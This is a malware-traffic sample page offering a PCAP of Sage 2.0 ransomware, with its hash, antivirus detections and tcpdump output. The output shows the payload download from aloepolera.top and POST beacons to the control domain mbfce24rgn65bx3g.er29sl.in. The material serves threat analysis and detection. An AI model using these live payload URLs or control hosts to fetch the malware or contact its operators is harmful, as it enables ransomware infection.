Text Example

Sage 2.0 Ransomware Malware Trojan Traffic Analysis Sample FULL PCAP File Download mbfce24rgn65bx3g.er29sl.in

Download Attachments

  • 1 pcap 0dat
    Date added: January 21, 2017 11:14 pm Added by: admin File size: 11 KB Downloads: 168
SHA256: 408e5e7d86d222882eab6a3f5cc71ccd9c2d98c74a6b321c761b7ef6f82c88ba
File name: read.php?f=0.dat.1
Detection ratio: 22 / 55
Analysis date: 2017-01-21 23:05:38 UTC ( 0 minutes ago )
aspersky HEUR:Trojan.Win32.Generic 20170120
Malwarebytes Trojan.MalPack.VB 20170120
McAfee PWSZbot-FHN 20170120
McAfee-GW-Edition BehavesLike.Win32.Worm.tt 20170120
eScan Trojan.GenericKD.4185884 20170120
Microsoft Trojan:Win32/Dynamer!ac 20170120
Panda Trj/GdSda.A 20170120
Qihoo-360 HEUR/QVM03.0.A425.Malware.Gen 20170121
Sophos Troj/Zbot-LPS 20170120
Symantec ML.Relationship.HighConfidence [Infostealer.Limitail] 20170120
Tencent Win32.Trojan.Generic.Swba 20170121
TrendMicro TSPY_INFOSTEAL.RRG 20170121
TrendMicro-HouseCall TSPY_INFOSTEAL.RRG 20170121
VIPRE Trojan.Win32.Generic!BT 20170121
ViRobot Trojan.Win32.Infostealer.1854296[h] 20170121
Yandex Trojan.Injector!fxtPd0Ocb/U 20170120

 

2017-01-21 01:34:57.576124 IP 192.168.1.102.50646 > 84.200.34.99.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..M3.@….U…fT.”c…Pa..F..3.P…….GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aloepolera.top
Connection: Keep-Alive

 

2017-01-21 01:35:24.493431 IP 192.168.1.102.61133 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG$………fKKKK…5.4
.3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:25.478850 IP 192.168.1.102.61134 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG%………fKKKK…5.4
.3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:26.479008 IP 192.168.1.102.61135 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG&………fKKKK…5.4
.3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:26.493504 IP 192.168.1.102.61133 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0……h…fKKLL…5.4      .3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:26.782549 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [S], seq 4173774261, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.D@……..f6.’….P………. ……………..
2017-01-21 01:35:26.811246 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [.], ack 3223055681, win 256, length 0
E..(.E@……..f6.’….P…….AP…e………
2017-01-21 01:35:26.812435 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [P.], seq 0:93, ack 1, win 256, length 93: HTTP: POST / HTTP/1.1
E….F@….v…f6.’….P…….AP…2…POST / HTTP/1.1
Host: mbfce24rgn65bx3g.er29sl.in
Content-Length: 167
Connection: close

2017-01-21 01:35:27.478619 IP 192.168.1.102.61134 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0……g…fKKLL…5.4      .3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:27.946618 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [.], ack 112, win 256, length 0
E..(.H@……..f6.’….P……..P…c………
2017-01-21 01:35:27.947809 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [F.], seq 260, ack 112, win 256, length 0
E..(.I@……..f6.’….P……..P…c………
2017-01-21 01:35:28.478763 IP 192.168.1.102.61135 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0……f…fKKLL…5.4      .3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:28.776237 IP 192.168.1.102.50646 > 84.200.34.99.80: Flags [F.], seq 293, ack 274776, win 1180, length 0
E..(3.@……..fT.”c…Pa..k..dbP… 8……..
2017-01-21 01:35:29.478828 IP 192.168.1.102.61134 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG*………fKKKK…5.4
.3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:31.479076 IP 192.168.1.102.61134 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0……d…fKKLL…5.4      .3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:32.245715 IP 192.168.1.102.61136 > 75.75.75.75.53: 60353+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG,………fKKKK…5.4Q…………..mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:32.265343 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [S], seq 1829708398, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4x.@……..fB……Pm.”n…… ..T…………..
2017-01-21 01:35:32.316926 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [.], ack 1944042060, win 256, length 0
E..(x.@….     …fB……Pm.”os..LP…/………
2017-01-21 01:35:32.317860 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [P.], seq 0:93, ack 1, win 256, length 93: HTTP: POST / HTTP/1.1
E…x.@……..fB……Pm.”os..LP…….POST / HTTP/1.1
Host: mbfce24rgn65bx3g.er29sl.in
Content-Length: 167
Connection: close

Leave a Reply